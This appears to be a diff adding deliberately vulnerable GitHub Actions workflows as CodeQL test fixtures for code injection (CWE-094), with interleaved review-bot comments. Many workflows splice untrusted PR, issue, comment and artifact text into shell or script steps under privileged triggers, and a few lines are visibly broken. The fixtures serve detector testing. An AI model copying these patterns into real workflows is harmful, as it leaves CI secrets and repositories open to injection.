@@ -0,0 +1,231 @@ +name: 📤 Preview Deploy + +on: + workflow_run: + workflows: + - đŸŽŦ Setup + types: + - completed + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + if: ${{ github.event.workflow_run.conclusion == 'success' }} + runs-on: ubuntu-latest + + outputs: + id: ${{ steps.pr.outputs.value }} + ref: ${{ steps.ref.outputs.value }} + repo: ${{ steps.repo.outputs.value }} + + steps: + # Get PR id from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-id + + - name: get PR id + id: pr + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR ref from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-ref + + - name: get PR ref + id: ref + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR repo from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-repo + + - name: get PR repo + id: repo + run: echo "value=$(> $GITHUB_OUTPUT + + prepare: + runs-on: ubuntu-latest + needs: [setup] + + steps: + # ================= Create Comment ================= + - name: đŸ§Ŋ Find And Delete Comment + uses: peter-evans/find-comment@v2 + if: ${{ needs.setup.outputs.id != '' }} + id: fc + with: + issue-number: ${{ needs.setup.outputs.id }} + comment-author: 'github-actions[bot]' + body-includes: View Deployment + + - name: 📝 Create or update comment + uses: peter-evans/create-or-update-comment@v3 + if: ${{ needs.setup.outputs.id != '' }} + with: + comment-id: ${{ steps.fc.outputs.comment-id }} + issue-number: ${{ needs.setup.outputs.id }} + body: | + ## View Deployment + + [#${{ github.run_id 
}}](https://github.com/dream-num/univer/actions/runs/${{ github.run_id }}) + +

+ đŸĨ 🍔 đŸĨ“ đŸĨ— đŸĨ˜ đŸŒ¯ 🍚 🍛 🍖 🍭 🍧 🍝 đŸĨĒ đŸĨ– đŸĒ
+ Still cooking, please come back later
+ đŸĨ™ đŸĨŽ đŸĨ¨ 🌭 đŸĻ 🍙 🍕 🍰 🍮 🍜 🍡 🍱 đŸŋ 🍕 đŸĨŸ +

+ edit-mode: replace + + build-demo: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-demo-dev.outputs.preview-url == '' && steps.vercel-demo.outputs.preview-url || steps.vercel-demo-dev.outputs.preview-url }} + commit-message: ${{ steps.commit-message.outputs.value }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + - name: Get commit message + id: commit-message + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + + # ================= Deploy Demo ================= + - name: đŸ“Ļ Build demo + run: pnpm build:demo + + - name: Copy demo to workspace + run: | + mkdir .workspace + cp -r ./examples/local/* .workspace + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-demo + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-demo-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + + build-storybook: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-storybook-dev.outputs.preview-url == '' && steps.vercel-storybook.outputs.preview-url || steps.vercel-storybook-dev.outputs.preview-url }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + 
uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + # ================= Deploy Storybook ================= + - name: đŸ“Ļ Build storybook + run: pnpm storybook:build + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-storybook + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (storybook) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-storybook-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + + notify: + runs-on: ubuntu-latest + needs: [setup, build-demo, build-storybook] + + steps: + - name: Invoke deployment hook + uses: actions/github-script@v3 + with: + script: > + { + "type": "build", + "workflow": { + "id": "${{ github.run_id }}" + }, + "commit": { + "ref": "${{ needs.setup.outputs.ref }}", + "message": "${{ needs.build-demo.outputs.commit-message }}", + "id": "${{ github.event.workflow_run.head_commit.id }}", + "author": "${{ github.event.workflow_run.head_commit.author.name }}" + }, + "preview": { + "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", + "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" + } + } + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml new file mode 100644 index 000000000000..559c69c4710f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml 
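Review bot: The three `run: echo "value=$(> $GITHUB_OUTPUT` lines in the `setup` job are not valid shell as shown; the text between `$(` and `>` appears to have been lost in rendering (an input redirection of the form `$(<file)` would be consumed as markup), so the committed fixture should be checked rather than trusted from this view — the same applies to `chart_version=$(> $GITHUB_OUTPUT` in the test27.yml hunk further down. Several step names carry mis-encoded UTF-8 (`đŸŽŦ Setup`, `đŸ“Ļ Build demo`), which suggests the file was saved or copied in a non-UTF-8 encoding; if the emoji are not needed by the test, plain ASCII names would avoid that. The `notify` job's `script:` is a bare JSON object rather than JavaScript, which `actions/github-script` would not execute; a comment noting that only the expression interpolation matters for this fixture would spare a reader from trying to fix it.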
@@ -0,0 +1,74 @@ +name: Test + +on: + issue_comment: + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + runs-on: ubuntu-latest + steps: + - name: Get PR details + id: get-pr + if: github.event_name == 'issue_comment' + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Set PR source branch as env variable + if: github.event_name == 'issue_comment' + run: | + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') + echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV + setup2: + runs-on: ubuntu-latest + steps: + - name: Get PR details + uses: octokit/request-action@v2.x + id: get-pr-details + with: + route: GET /repos/{repository}/pulls/{pull_number} + repository: ${{ github.repository }} + pull_number: ${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} + - name: Set environment variables + run: | + MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} + if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." 
>> $GITHUB_ENV; fi + echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV + echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV + setup3: + runs-on: ubuntu-latest + steps: + - id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} + - run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + setup4: + runs-on: ubuntu-latest + steps: + - id: get-pull-request + uses: octokit/request-action@v2.x + with: + route: GET /repos/{owner}/{repo}/pulls/{pull_number} + owner: foo + repo: bar + pull_number: ${{ github.event.issue.number }} + + - run: >- + echo "Pull request title is \"${{ + fromJson(steps.get-pull-request.outputs.data).title }}\" but expected + \"Updated test pull request\"" && exit 1 + + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml new file mode 100644 index 000000000000..552ad866b5ae --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml 
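Review bot: In `setup2`, the `COMMENT=` line interpolates `${{ env.HEAD_REF }}` and `${{ env.BASE_REF }}` before the same step writes those names to `$GITHUB_ENV`, and `$GITHUB_ENV` only becomes visible to subsequent steps, so both expand to empty strings; moving the two `echo "... >> $GITHUB_ENV"` lines into an earlier step, or the COMMENT line into a later one, would make the fixture do what it reads as doing. `if $MERGE_STATUS; then` also executes the value of `mergeable` as a command, and that field can be `null`, so the step would fail with a command-not-found error; `if [ "$MERGE_STATUS" = "true" ]; then` is the safer comparison. The `setup3` route `GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues` repeats the owner, since `github.repository` already contains `owner/repo`.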
@@ -0,0 +1,33 @@ +on: + workflow_dispatch: + +jobs: + fetch-issues: + runs-on: ubuntu-latest + steps: + - name: Fetch open issues + id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/foo/bar/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} + + - name: Write issues to file + run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + + - name: Setup Node.js + uses: actions/setup-node@v2 + with: + node-version: '14' + + - name: Print issue URLs + run: | + const fs = require('fs'); + const issues = JSON.parse(fs.readFileSync('issues.json', 'utf8')); + const filteredIssues = issues.filter(issue => issue.body.includes('Is your portal managed or self-hosted?\r\n\r\nManaged')); + for (const issue of filteredIssues) { + console.log(issue.html_url); + } + shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml new file mode 100644 index 000000000000..804d55a7db28 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml 
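Review bot: The `Print issue URLs` step runs JavaScript under `shell: bash`, so every line from `const fs = require('fs');` onward is a bash syntax error and the step cannot succeed as written. If the step exists only so that the earlier `echo '${{ steps.issues.outputs.data }}' > issues.json` line has a consumer, a comment saying so would stop a reader from trying to repair it; otherwise `shell: node {0}` would make it runnable. `actions/setup-node@v2` is also pinned to a mutable major tag, unlike the SHA-pinned `actions/checkout` in the test27.yml hunk below.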
@@ -0,0 +1,112 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + pulls1: + runs-on: ubuntu-latest + steps: + - id: head_ref + run: | + HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" + - id: title + run: | + TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh pr view $PR_NUMBER --json body --jq .body) + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + - id: files + run: | + CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" + - id: author + run: | + AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" + pulls2: + runs-on: ubuntu-latest + steps: + - id: head_ref + run: | + HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" + - id: title + run: | + TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") + echo 
"body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + - id: files + run: | + CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" + - id: author + run: | + AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" + issues1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body') + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + issues2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + + + + 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml new file mode 100644 index 000000000000..03ee63fe9cf4 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -0,0 +1,64 @@ +name: List files + +on: + pull_request_target: + types: [ opened, synchronize, workflow_dispatch] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed + with: + list-files: json + filters: | + locale: + - '*.xml' + - name: Changed files 1 + run: | + echo changed: ${{ steps.changed.outputs.locale_files }} + echo changed: ${{ steps.changed.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed2 + with: + list-files: csv + filters: | + locale: + - '*.xml' + - name: Changed files 2 + run: | + echo changed:${{ steps.changed2.outputs.locale_files }} + echo changed: ${{ steps.changed2.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed3 + with: + list-files: shell + filters: | + locale: + - '*.xml' + - name: Changed files 3 + run: | + echo changed:${{ steps.changed3.outputs.locale_files }} + echo changed: ${{ steps.changed3.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed4 + with: + list-files: escape + filters: | + locale: + - '*.xml' + - name: Changed files 4 + run: | + echo changed:${{ steps.changed4.outputs.locale_files }} + echo changed: ${{ steps.changed4.outputs.changes }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml new file mode 100644 index 000000000000..27d8a666fc9e --- /dev/null 
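Review bot: `types: [ opened, synchronize, workflow_dispatch]` lists `workflow_dispatch` as a `pull_request_target` activity type, which it is not; it would need to be a separate top-level entry under `on:`. The job also sets `GITHUB_TOKEN` at `env:` for every step although none of the four `dorny/paths-filter` invocations or the echo steps read it, and together with the `contents: write` / `pull-requests: write` job permissions this grants more than the fixture exercises; a comment stating that the token and permissions are part of the scenario being modelled (or dropping them) would help.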
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml @@ -0,0 +1,19 @@ + +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + steps: + - name: Preliminary Information + run: | + echo "The job was automatically triggered by a ${{ github.event_name }} event." + echo "This job is now running on a ${{ runner.os }} server hosted by GitHub!" + echo "The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}." + echo " " + echo "github.ref = ${{ github.ref }}" + echo "github.sha = ${{ github.sha }}" + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" + echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" + echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" + echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" + echo " " diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml new file mode 100644 index 000000000000..03ecc20de86a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml 
@@ -0,0 +1,24 @@ +on: + push: + branches: + - main + - 'release/v*' + workflow_dispatch: + inputs: + version: + required: true + description: 'Release' + type: string + +jobs: + release-tag: + runs-on: ubuntu-latest + if: ${{ startsWith(github.event.head_commit.message, 'release:') }} + steps: + - name: Extract version and PR number from commit message + id: extract_info + shell: bash + run: | + echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT + echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT + echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml new file mode 100644 index 000000000000..52f7e8964c13 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml @@ -0,0 +1,12 @@ +on: + workflow_run: + workflows: [ 'Pull-Request Checks' ] + types: [ completed ] + +jobs: + publish-results: + uses: TestOrg/TestRepo/.github/workflows/publishResults.yml@master + with: + botGithubId: bot + secrets: + githubBotPAT: ${{ secrets.BOT_PAT }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml new file mode 100644 index 000000000000..184bcd966108 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml 
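Review bot: The `workflow_dispatch` trigger and its required `version` input are dead in this fixture: the job's `if: ${{ startsWith(github.event.head_commit.message, 'release:') }}` can only hold on a `push` event, because a dispatch payload does not carry `head_commit`, and `inputs.version` is never read. Either drop the dispatch trigger or extend the condition with `|| github.event_name == 'workflow_dispatch'` and use `inputs.version` in the `run:` block. The three `sed` substitutions also print the whole commit message unchanged when their pattern does not match, so `version=` and `pr_number=` can receive arbitrary text rather than a number; `sed -n 's/.../\1/p'` would leave them empty instead.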
@@ -0,0 +1,64 @@ +on: + workflow_run: + +jobs: + test: + runs-on: ubuntu-22.04 + if: > + (github.event.workflow_run.event == 'pull_request' || + github.event.workflow_run.event == 'pull_request_target') && + github.event.workflow_run.conclusion == 'success' + + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "doc-build-artifact" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{steps.setup-env.outputs.current_work_dir}}/doc-build-artifact.zip', Buffer.from(download.data)); + + - run: | + mkdir build_dir + unzip doc-build-artifact.zip -d build_dir + + - name: Get commit_sha & pr_number + id: github-context + run: | + content_commit_sha=$(cat ./build_dir/commit_sha) + if [[ $content_commit_sha =~ ^[0-9a-zA-Z]{40}$ ]]; then + echo "commit_sha=$content_commit_sha" >> $GITHUB_OUTPUT + rm -rf ./build_dir/commit_sha + else + echo "Encountered an invalid commit_sha" + exit 1 + fi + + content_pr_number=$(cat ./build_dir/pr_number) + if [[ $content_pr_number =~ ^[0-9]+$ ]]; then + echo "pr_number=$content_pr_number" >> $GITHUB_OUTPUT + rm -rf ./build_dir/pr_number + else + echo "Encountered an invalid pr_number" + exit 1 + fi + + - run: | + echo "hub_docs_url=pr_${{ steps.github-context.outputs.pr_number }}" >> $GITHUB_OUTPUT + + - run: | + cd build_dir + doc-builder push --commit_msg "Updated with commit ${{ steps.github-context.outputs.commit_sha }} 
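Review bot: `fs.writeFileSync('${{steps.setup-env.outputs.current_work_dir}}/doc-build-artifact.zip', ...)` references a step id `setup-env` that does not exist in the job, so the expression expands to empty and the archive is written to `/doc-build-artifact.zip`, while the next step runs `unzip doc-build-artifact.zip` in the workspace and will not find it. The `commit_sha` check `^[0-9a-zA-Z]{40}$` accepts any 40 alphanumerics; `^[0-9a-f]{40}$` matches what git produces and is the tighter validation for a value that is later interpolated into the `doc-builder push` command. That final `--commit_msg "Updated with commit ${{ steps.github-context.outputs.commit_sha }}` line appears cut off in this view (no closing quote after the expression), so the committed file's last line is worth confirming.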
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml new file mode 100644 index 000000000000..a90c55df9377 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml @@ -0,0 +1,19 @@ +on: + issues: + +jobs: + test: + runs-on: ubuntu-22.04 + steps: + - name: Run Issue form parser + id: parse + uses: peter-murray/issue-forms-body-parser@v4.0.0 + with: + issue_id: ${{ github.event.issue.number }} + separator: '###' + label_marker_start: '>>' + label_marker_end: '<<' + + - name: Show parsed data JSON + run: | + echo ${{ steps.parse.outputs.payload }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml new file mode 100644 index 000000000000..0bd666dc9485 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml @@ -0,0 +1,13 @@ +name: Issue Forms Body Parser + +on: issues + +jobs: + process: + runs-on: ubuntu-latest + steps: + - name: Issue Forms Body Parser + id: parse + uses: zentered/issue-forms-body-parser@v2.0.0 + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml new file mode 100644 index 000000000000..8648d86983ee --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml 
@@ -0,0 +1,29 @@ +name: Issue Forms Body Parser + +on: + workflow_dispatch: + inputs: + issue_number: + type: string + description: issue number + required: true +env: + GH_TOKEN: ${{ github.token }} + +jobs: + process: + runs-on: ubuntu-latest + steps: + - name: Fetch the issue + id: read_issue_body + run: + echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT + + - name: Issue Forms Body Parser + id: parse + uses: zentered/issue-forms-body-parser@v2.0.0 + with: + body: ${{ steps.read_issue_body.outputs.body }} + + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml new file mode 100644 index 000000000000..e9ba77c0f939 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml 
@@ -0,0 +1,52 @@ +name: Test WR + +on: + workflow_run: + workflows: + - Test + types: + - completed + +permissions: + contents: write + pull-requests: write + +jobs: + setup: + name: Setup + runs-on: ubuntu-24.04 + outputs: + github-sha: ${{ steps.get-sha.outputs.sha }} + chart-version: ${{ steps.get-version.outputs.chart_version }} + steps: + - name: Get triggering event SHA + id: get-sha + run: | + if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then + echo sha="${{ inputs.checkout_ref }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "workflow_run" ]]; then + echo sha="${{ github.event.workflow_run.head_sha }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "push" ]]; then + echo sha="${{ github.sha }}" >> $GITHUB_OUTPUT + else + echo "Invalid event type" + exit 1 + fi + - name: Checkout Source Code + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + persist-credentials: false + ref: ${{ steps.get-sha.outputs.sha }} + fetch-depth: 0 + - name: Get version + id: get-version + run: | + echo "chart_version=$(> $GITHUB_OUTPUT + - name: Check out scripts + uses: actions/checkout@v3 + - name: Setup Node + uses: actions/setup-node@v3 + with: + node-version: '14' + check-latest: true + - name: Install dependencies + run: | + cd .github/scripts + npm install + - name: Approve or deny request + uses: actions/github-script@main + env: + VERSION: ${{ steps.get_version.outputs.version }} + with: + debug: true + script: | + const options = { token: '${{ secrets.TOKEN }}', adminOpsOrg: '${{ vars.ADMIN_OPS_ORG }}', actionsApprovedOrg: '${{ vars.ACTIONS_APPROVED_ORG }}', actionsApproverTeam: '${{ vars.ACTIONS_APPROVERS_TEAM }}', baseUrl: '${{ github.api_url }}', version: process.env.VERSION }; + const payload = ${{ needs.parse-issue.outputs.payload }} + await require('./.github/scripts/approve-or-deny-request.js')({github, context, payload, options}); 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml new file mode 100644 index 000000000000..75bf0527ee8b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml @@ -0,0 +1,27 @@ +name: Test +on: + issue_comment: + types: [created, edited] + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Dump GitHub comment context + id: github_comment_step + run: echo '${{ toJSON(github.event.comment) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event.issue) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event) }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml new file mode 100644 index 000000000000..b9b861bd060c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml @@ -0,0 +1,13 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo '${{ toJSON(github.event.comment.body).foo }}' + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml new file mode 100644 index 000000000000..535b9bd24bef --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml @@ -0,0 +1,16 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest 